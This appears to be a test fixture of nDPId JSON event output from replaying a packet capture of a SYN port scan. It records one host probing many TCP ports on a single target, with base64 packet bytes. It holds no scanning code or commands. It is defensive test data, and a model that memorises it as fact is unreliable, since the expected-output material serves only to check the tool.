-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1684,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1684,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1674,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsyRcAACcGWFusEAAIQA2GNIzSTv3dUoMYAAAAAGACEADZkQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1685,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1685,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1675,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsPAAAADYG1nKsEAAIQA2GNIzSGgvdUoMYAAAAAGACDAAShAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1686,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1686,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1676,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAscNkAACkGrpmsEAAIQA2GNIzSG7\/dUoMYAAAAAGACCAAU0AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1687,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1677,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsWzsAACgGxTesEAAIQA2GNIzSB9rdUoMYAAAAAGACBAAstQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1688,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30951,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1688,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1678,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAseaYAADcGl8ysEAAIQA2GNIzSeOfdUoMYAAAAAGACEACvpwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1689,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1689,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1679,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAstGYAACYGbgysEAAIQA2GNIzSBEHdUoMYAAAAAGACDAAoTgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1690,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060968,"flow_last_seen":1278275060968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060968,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1690,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1680,"flow_packet_id":1,"flow_last_seen":1278275060968,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060968,"pkt":"ACYLMQczACWzv5HuCABFAAAs5AYAADgGLGysEAAIQA2GNIzSC17dUoMYAAAAAGACBAApMQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060969,"flow_last_seen":1278275060969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060969,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5357,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1681,"flow_packet_id":1,"flow_last_seen":1278275060969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060969,"pkt":"ACYLMQczACWzv5HuCABFAAAsD\/oAACUGE3msEAAIQA2GNIzSFO3dUoMYAAAAAGACCAAbogAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1692,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1692,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsEeMAADAGBpCsEAAIQA2GNIzTAgPdU4MZAAAAAGACBAAyiQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1693,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1693,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1683,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsPmQAACcG4w6sEAAIQA2GNIzTCk7dU4MZAAAAAGACEAAePgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1694,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1694,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1684,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAs2NYAACkGRpysEAAIQA2GNIzTFa7dU4MZAAAAAGACCAAa3gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1695,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1695,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1685,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsj\/QAADMGhX6sEAAIQA2GNIzSGvXdUoMYAAAAAGACEAANmgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1696,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25735,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1696,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1686,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsDT8AACsGEDSsEAAIQA2GNIzSZIfdUoMYAAAAAGACEADEBwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1697,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6969,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1697,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1687,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsrMsAADQGZ6esEAAIQA2GNIzSGzndUoMYAAAAAGACBAAZVgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1698,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1698,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1688,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsXC4AACkGw0SsEAAIQA2GNIzSC7vdUoMYAAAAAGACCAAk1AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1699,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1699,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1689,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsTDIAADEGy0CsEAAIQA2GNIzSC8PdUoMYAAAAAGACCAAkzAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1700,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1700,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1690,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAsR\/MAADsGxX+sEAAIQA2GNIzSw1LdUoMYAAAAAGACEABlPAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1701,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061001,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1701,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_packet_id":1,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061001,"pkt":"ACYLMQczACWzv5HuCABFAAAskHEAACwGjAGsEAAIQA2GNIzSJw7dUoMYAAAAAGACBAANgQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1702,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1702,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1692,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAsPLkAAC0G3rmsEAAIQA2GNIzSD57dUoMYAAAAAGACCAAg8QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1703,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1703,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1693,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAsvIoAADQGV+isEAAIQA2GNIzSB9bdUoMYAAAAAGACBAAsuQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1704,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1704,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAso+IAADgGbJCsEAAIQA2GNIzSBDjdUoMYAAAAAGACBAAwVwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1705,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1705,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1695,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/0IAACwGHTCsEAAIQA2GNIzSF3bdUoMYAAAAAGACBAAdGQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1706,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1706,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1696,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAsVSwAADEGwkasEAAIQA2GNIzSC73dUoMYAAAAAGACCAAk0gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1707,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1707,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1697,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAsfrsAADsGjresEAAIQA2GNIzSFgHdUoMYAAAAAGACEAASjgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1708,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 